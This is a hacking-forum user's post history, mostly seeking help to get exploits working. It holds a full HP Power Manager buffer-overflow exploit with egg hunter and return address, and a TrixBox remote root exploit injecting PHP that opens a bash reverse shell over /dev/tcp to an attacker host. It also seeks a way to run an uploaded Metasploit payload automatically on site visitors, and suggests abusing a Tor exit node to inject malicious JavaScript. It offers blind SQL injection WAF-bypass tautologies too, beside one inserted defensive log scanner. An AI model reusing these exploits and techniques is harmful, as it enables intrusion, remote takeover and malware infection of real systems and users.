Hacking and Security / Blind SQL with WAF
« on: December 24, 2014, 01:53:30 pm »
Hi guys, I came across this application which is using a WAF on certain strings and has some preg_match and preg_replace functions.

Anyway, I have managed to get some results, although very simple: instead of the usual ' or 1=1 -- I am using the following, (1)or(1)=(1), which returns 5 pictures; when I change it to (1)or(1)=(2) then I just get the one picture.

How can I increase on this and start to gather database information? So I'm struggling to construct an order by or union.
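An added example, not code from the original post, of how a defender would spot the boolean pairs described above in web access logs: the parameter value is decoded and normalised (parentheses and comments stripped) before the tautology check, which is exactly the step a string-blacklist WAF built on preg_match skips. The log lines and parameter names are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not from the original post); lines 3-5
# carry the parenthesised forms the post describes, line 2 the classic form.
SAMPLE_LOG = [
    'GET /gallery.php?id=7 HTTP/1.1',
    'GET /gallery.php?id=7%27%20or%201%3D1%20-- HTTP/1.1',
    'GET /gallery.php?id=7(1)or(1)%3D(1) HTTP/1.1',
    'GET /gallery.php?id=7(1)or(1)%3D(2) HTTP/1.1',
    'GET /gallery.php?id=(2)or(2)=(2) HTTP/1.1',
    'GET /search.php?q=orange%20oranges HTTP/1.1',
]

def normalize(value):
    """Undo the obfuscation layers a regex blacklist typically misses."""
    v = unquote_plus(value)
    v = re.sub(r'/\*.*?\*/', ' ', v)   # inline comments used as separators
    v = re.sub(r'[()]', ' ', v)        # parentheses separate tokens in SQL
    return re.sub(r'\s+', ' ', v).strip().lower()

# <anything> OR <operand> = <operand>; operands may be quoted or bare.
# The \b after "or" keeps words like "order" and "oranges" from matching.
TAUTOLOGY = re.compile(r"\bor\b\s*('?\w+'?)\s*=\s*('?\w+'?)")

def classify(value):
    """Return 'true'/'false' for a boolean probe, None if no OR-comparison."""
    m = TAUTOLOGY.search(normalize(value))
    if not m:
        return None
    lhs, rhs = (s.strip("'") for s in m.groups())
    return 'true' if lhs == rhs else 'false'

def scan(lines):
    """Return (param, raw_value, verdict) for every flagged query parameter."""
    hits = []
    for line in lines:
        m = re.match(r'\S+ \S+\?(\S+) ', line)
        if not m:
            continue
        for pair in m.group(1).split('&'):
            key, _, raw = pair.partition('=')
            verdict = classify(raw)
            if verdict:
                hits.append((key, raw, verdict))
    return hits

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print('%s=%s -> tautology %s' % hit)
```

A true/false pair against the same parameter from one client within a short window is the signature of blind probing, regardless of how the operands are wrapped.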


Hacking and Security / Re: Help getting exploit working
« on: July 19, 2011, 07:17:40 pm »
Yes, tried that; this is needed as it's the unique string for the egg hunter which has to be placed before the shellcode. It's kind of a marker.

It's been baffling me for a few days now  :o

Hacking and Security / Help getting exploit working
« on: July 19, 2011, 06:09:26 pm »
I need to get this working on a Windows 7 box

The RET address is universal

The box is exploitable

I think it's something to do with the Egg Hunter appended "n00bn00b"

Any help would be appreciated
Code:
import sys
from socket import *
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__"
try:
   HOST  = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]
PORT  = 80
RET   = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
evil =  "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + EH + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,SHELL,HOST)
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST

Hacking and Security / Re: Cracking wifi passwords
« on: July 15, 2011, 11:01:23 pm »
Check out my video; the quality is a bit shitty but it should get you started.

Great  ;D

Works like a charm


Well it's deffo running the right version, see screenshot, so there must be a way to get this code to work somehow.

So you got any ideas on how I can get the session?


I have an error in the code below and I'm not sure why; I'm guessing it has something to do with the def find_sessionid part.

Any help would be greatly appreciated

Error below

Code:
TypeError: cannot concatenate 'str' and 'NoneType' objects

Code:
import sys
from socket import *
import re
import os
from time import sleep
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
if (len(sys.argv)!=5):
    print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 \r\n"
        "Host: \r\n"
        "Content-Type: application/x-www-form-urlencoded \r\n"
        "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
        return buffer
def send_post(host,port,input):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    return output
def find_sessionid(http_output):
    for header in headers:
                    cook=header.split(" ")
                    print "[*] Session ID is %s" % sessionid
            return sessionid
print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
print "[*] Extracting Session ID"
print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
print "[*] Cleaning up"
print "[*] Done!"
# [2008-07-12]

.NET Framework / Re: ASP code for msfpayload
« on: July 13, 2011, 05:40:04 pm »
Cheers, I will give it a whirl

.NET Framework / Re: ASP code for msfpayload
« on: July 13, 2011, 04:50:17 pm »
Well yeah, I got a shell, however it's unprivileged and running as IUSR. I uploaded the exe to the web server, and I navigate to it and manually click on the exe, which in turn loads me up a shell via the multi/handler.

The meterpreter shell times out; can't getsystem, or sysinfo, or drop into a shell.

The exe is not asp; it's clicked on directly in the Scripts directory and loaded as an exe.

I need an asp page that loads the exe by itself without me clicking on it. So, for example, the user navigates to the site and the exe is executed.

General discussion / Re: IRC link
« on: July 13, 2011, 04:25:21 pm »
"cannot connec to host. maybe you mispelled it!"

General discussion / IRC link
« on: July 13, 2011, 04:12:27 pm »
IRC link no longer works for me.

.NET Framework / ASP code for msfpayload
« on: July 13, 2011, 03:38:39 pm »
I've uploaded a Metasploit payload to an IIS webserver in the Scripts directory; currently I am executing the script directly from the browser, which in turn is causing me problems. Anyone got any ideas how I can create a dummy asp page which in turn executes my payload, which will run server side?

Hacking and Security / Re: Hey, IM LOST
« on: March 27, 2011, 11:02:57 am »
BackTrack 5 (Unreleased at this time) is actually built off of Ubuntu ;)


Not sure if BT4 is built off of slax or ubuntu for sure.

Yeah, very true. I was just thinking back to the time when I was a newbie; I could never get to grips with BackTrack for some reason. I tried to immerse myself in it daily, but it's just not built to be an everyday system; even BT R2 still doesn't feel finished, if you know what I mean  :o Let's hope BT 5 is just like Ubuntu, as that's a pretty easy to use and stable OS.

My main point really is that it's better to immerse yourself daily in what you want to learn. With Ubuntu you can do this; for example, your network/wireless will show up automatically, whereas in BT it doesn't, and that could confuse the beginner.

Also, the BT forums are not very friendly if you require help.

Anonymity and Privacy / Re: Tor project
« on: March 27, 2011, 10:28:19 am »
Very true, it is slow and leaves too many logs about. I think they are currently working on the speed issue.

On the plus side, though, you could be an exit node for the onion network; this way you can see all the traffic and get up to all sorts of mischief. You could modify the traffic for your own gain, MITM attacks by injecting some JavaScript to redirect to a malicious website to install malware.

I would recommend either a highly anonymous proxy, or use an ssh tunnel for proxy connections.

Even better nowadays is the use of cellular connections; pretty hard to track, as normally each time you connect they are dynamically assigned. Of course the operator could tie the IP to you. So if you think someone is tracking your activities, just reconnect.

